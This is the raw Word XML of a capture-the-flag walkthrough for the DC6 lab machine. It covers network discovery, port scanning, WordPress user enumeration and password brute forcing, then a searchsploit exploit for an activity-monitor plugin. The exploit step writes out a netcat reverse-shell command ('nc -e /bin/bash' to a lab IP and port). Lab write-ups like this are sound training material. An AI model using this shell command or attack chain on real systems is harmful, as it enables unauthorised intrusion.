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B85" w14:textId="4B3E95D8" w:rsidR="00C173B3" w:rsidRDefault="00E75BB6" w:rsidP="00E75BB6">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough – DC6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DAB5D1" w14:textId="04204BEA" w:rsidR="00E75BB6" w:rsidRDefault="00E54D1A" w:rsidP="00350D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0065D" wp14:editId="2D1F37D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>241224</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3676190" cy="333333"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="101047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29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scan devices on the same </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF99F9A" w14:textId="07909189" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E5D3995" wp14:editId="502BFB0D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>321513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5647619" cy="190476"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11999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70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F08AE" w14:textId="24355B53" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="227BA4D3" w14:textId="65250A34" w:rsidR="00350D1B" w:rsidRDefault="00C753E4" w:rsidP="0091100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1E7EC7" wp14:editId="3C295214">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>380213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3200000" cy="342857"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8832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1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009">
        <w:t xml:space="preserve">Now we have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00911009">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00911009">
        <w:t xml:space="preserve"> of our victim, we can perform a port scan using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00911009">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00911009">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C8792B">
        <w:t xml:space="preserve"> I will use a non-ping stealth scan on all ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF3BE5" w14:textId="1864B976" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="49143746" w14:textId="0822AF8B" w:rsidR="00350D1B" w:rsidRDefault="00802E6F" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3913EF18" wp14:editId="332602F2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1609524" cy="476190"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="473046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6915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BCF8A" w14:textId="3BE28A72" w:rsidR="003371E9" w:rsidRDefault="003371E9" w:rsidP="00350D1B"/>
    <w:p w14:paraId="4EDFDAE7" w14:textId="4A4A8D35" w:rsidR="003C20BC" w:rsidRDefault="003C20BC" w:rsidP="003C20BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To obtain service information run the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D399AFE" w14:textId="033337D6" w:rsidR="003C20BC" w:rsidRDefault="00AA61C2" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B14650C" wp14:editId="78D89380">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>376529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5133333" cy="485714"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15065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63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0BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CB5AF17" wp14:editId="427BDA63">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1009878</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5486</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3609524" cy="333333"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="213222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04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59E6" w14:textId="7C4F8DCF" w:rsidR="00802E6F" w:rsidRDefault="00802E6F" w:rsidP="00350D1B"/>
    <w:p w14:paraId="3EEA9EC4" w14:textId="2F1B70C8" w:rsidR="00350D1B" w:rsidRDefault="00674A4E" w:rsidP="003371E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1B41D6" wp14:editId="20E1AD29">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>427736</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1771429" cy="342857"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="161796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693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1E9">
        <w:t>Since the load page doesn’t load straight to the home page, it re-directs us to the domain ‘wordy’. To fix this go into ‘/etc/hosts’ and enter the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C979C17" w14:textId="01E505DB" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="41777C96" w14:textId="0023E53D" w:rsidR="00350D1B" w:rsidRDefault="00A1135A" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="267F808D" wp14:editId="711ED06E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1667865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>60706</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2619375" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9582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07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56637" w14:textId="6BFDBC0B" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="1FB23028" w14:textId="46F0D860" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="7A16BBD0" w14:textId="3F1D379C" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="32ECB29A" w14:textId="0FAE6154" w:rsidR="00350D1B" w:rsidRDefault="00A1135A" w:rsidP="00A1135A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>It worked!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C4A05" w14:textId="6D9E11DC" w:rsidR="00635E2F" w:rsidRDefault="00AA097E" w:rsidP="00AA097E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quickly looking around the </w:t>
      </w:r>
      <w:r w:rsidR="00100DFD">
        <w:t>webpage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I can see labelling that </w:t>
      </w:r>
      <w:r w:rsidR="00100DFD">
        <w:t>suggests the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> site uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE5AEA">
        <w:t xml:space="preserve"> If this is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DE5AEA">
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DE5AEA">
        <w:t xml:space="preserve"> we can use the tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE5AEA">
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE5AEA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966D4C1" w14:textId="7AB40515" w:rsidR="00274CB1" w:rsidRDefault="00274CB1" w:rsidP="00274CB1"/>
    <w:p w14:paraId="63A004DD" w14:textId="5CBEE783" w:rsidR="00635E2F" w:rsidRDefault="009F64B9" w:rsidP="00635E2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9C55AC" wp14:editId="341C618C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3752697</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>246101</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2552700" cy="1464310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="439135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505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B92">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10D225B1" wp14:editId="16DF07A2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>262280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3554730" cy="338455"/>
            <wp:effectExtent l="0" t="0" r="7620" b="4445"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="49205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02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82" cy="33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9D0">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C739D0">
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C739D0">
        <w:t xml:space="preserve"> scan can be conducted using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB7EF6" w14:textId="2A2825CF" w:rsidR="00350D1B" w:rsidRDefault="009F64B9" w:rsidP="009F64B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The results show that there are 5 usernames that were found.</w:t>
      </w:r>
      <w:r w:rsidR="000C54C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5014992C" w14:textId="2589F768" w:rsidR="000C54C1" w:rsidRDefault="000C54C1" w:rsidP="009F64B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Users: admin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, graham, mark and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC18C4F" w14:textId="344C9D41" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="281804F9" w14:textId="7708AC69" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="2042BC73" w14:textId="7D89C5E4" w:rsidR="00350D1B" w:rsidRDefault="007E1265" w:rsidP="00DC5E7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8BB5029" wp14:editId="7B568558">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233654</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2392045" cy="274955"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19538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40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B42">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D2536">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002D2536">
        <w:t xml:space="preserve"> to find </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002D2536">
        <w:t>urls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE614E">
        <w:t>, the command is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA3102" w14:textId="68ED9569" w:rsidR="00621939" w:rsidRDefault="00621939" w:rsidP="00621939"/>
    <w:p w14:paraId="435FE142" w14:textId="41D96FA5" w:rsidR="00350D1B" w:rsidRDefault="00EE13E6" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D9CD3C0" wp14:editId="55B678A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>20574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2867025" cy="1644650"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4620141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4157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4F734" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="1D088956" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="0FEC6F61" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="61BB8C6C" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="6D57BB80" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="5CE2FF12" w14:textId="09C56B36" w:rsidR="00350D1B" w:rsidRDefault="007D1A60" w:rsidP="007D1A60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We have found a login page, which is useful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D1D6B1" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="4D4EB713" w14:textId="6F8A3BF3" w:rsidR="00350D1B" w:rsidRDefault="00645B67" w:rsidP="00DB29B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B63B65" wp14:editId="49F7AF52">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>230403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4196080" cy="306705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="144501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24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11AF5">
        <w:t>WpScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D11AF5">
        <w:t xml:space="preserve"> brute force.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It requires a URL and password wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3B149" w14:textId="07CFDAFA" w:rsidR="00DB29BB" w:rsidRDefault="00DB29BB" w:rsidP="00DB29BB"/>
    <w:p w14:paraId="1FB586BB" w14:textId="64B7EA85" w:rsidR="00350D1B" w:rsidRDefault="00820945" w:rsidP="0082094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6F0BDD" wp14:editId="3FCE1395">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>266650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3635375" cy="340995"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11360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5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should look something like this while cracking…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA27186" w14:textId="0A150D9D" w:rsidR="00820945" w:rsidRDefault="00820945" w:rsidP="00820945"/>
    <w:p w14:paraId="6764BDBB" w14:textId="2E93B7D0" w:rsidR="00350D1B" w:rsidRDefault="00C53776" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="655D2559" wp14:editId="105DAB83">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>111506</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2571429" cy="295238"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1460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92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660F3" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="0D02DEC5" w14:textId="787061B5" w:rsidR="00350D1B" w:rsidRDefault="006211CD" w:rsidP="00C53776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47AE41" wp14:editId="0ACF298D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1077671</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213842</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3664585" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="157224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1783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776">
        <w:t>Now we have a username and password</w:t>
      </w:r>
      <w:r w:rsidR="00FA5FA3">
        <w:t xml:space="preserve"> to login to the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E464F1" w14:textId="5E944037" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="135FD0E2" w14:textId="6E1B348A" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="08946E79" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="6EE85963" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="1978F4FE" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="6153F821" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="214E5809" w14:textId="53B53108" w:rsidR="00350D1B" w:rsidRDefault="006211CD" w:rsidP="00350D1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can see that this website is running </w:t>
      </w:r>
      <w:r>
        <w:t>WordPress 5.1.1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC62237" w14:textId="25779E4D" w:rsidR="00350D1B" w:rsidRDefault="00D10F31" w:rsidP="009C6BA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558F558" wp14:editId="534A4F62">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>211709</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>529818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1547495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="614094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4057" name="Picture 1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BAE">
        <w:t xml:space="preserve">Now since we have access to an activity </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009C6BAE">
        <w:t>monitor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009C6BAE">
        <w:t xml:space="preserve"> we can go into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009C6BAE">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C6BAE">
        <w:t xml:space="preserve"> and look for ‘word press activity monitor</w:t>
      </w:r>
      <w:r w:rsidR="00CF2BEC">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="009C6BAE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC26FCB" w14:textId="2ACAC3FA" w:rsidR="00350D1B" w:rsidRDefault="00567543" w:rsidP="00D10F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60EC329" wp14:editId="4D7C62B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>117043</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>263804</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="17883280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28083" name="Picture 1" descr="A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F31">
        <w:t>Once it is downloaded, we can modify the contents as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7C5DC5" w14:textId="7C348548" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="252DE8EB" w14:textId="6E76CD55" w:rsidR="00305ED6" w:rsidRDefault="00305ED6" w:rsidP="00546E11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> another terminal and use the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -e /bin/bash 192.168.56.101 9999”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0A0D8" w14:textId="0EEC9572" w:rsidR="00546E11" w:rsidRDefault="0048003F" w:rsidP="00546E1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B70C3AA" wp14:editId="24FCCF5F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259436</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3679190" cy="1286510"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="93604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4269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E11">
        <w:t>Run it through the web-browser (Drag and drop it)</w:t>
      </w:r>
      <w:r w:rsidR="00222455">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76645E61" w14:textId="7091BCE1" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="398EA079" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="6A0CA6D3" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="0C3F9729" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="75A0155B" w14:textId="20488E25" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="6CD6DBC4" w14:textId="77777777" w:rsidR="00AE3C94" w:rsidRDefault="00305ED6" w:rsidP="00305ED6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once pressed you should be </w:t>
      </w:r>
      <w:r w:rsidR="002E5FB6">
        <w:t>stuck on a continuous loading screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393B99F" w14:textId="77777777" w:rsidR="002D079D" w:rsidRDefault="002D079D" w:rsidP="00AE3C94"/>
    <w:p w14:paraId="1D109120" w14:textId="187BF29C" w:rsidR="00350D1B" w:rsidRDefault="0059544C" w:rsidP="002D07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C354BC" wp14:editId="28407F06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>219279</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3529965" cy="972820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="63016284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284" name="Picture 1" descr="A computer code on a dark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ED6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Now you are in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A854E" w14:textId="48204175" w:rsidR="0059544C" w:rsidRDefault="0059544C" w:rsidP="0059544C"/>
    <w:p w14:paraId="457FD12D" w14:textId="0BE32E65" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="39951B26" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
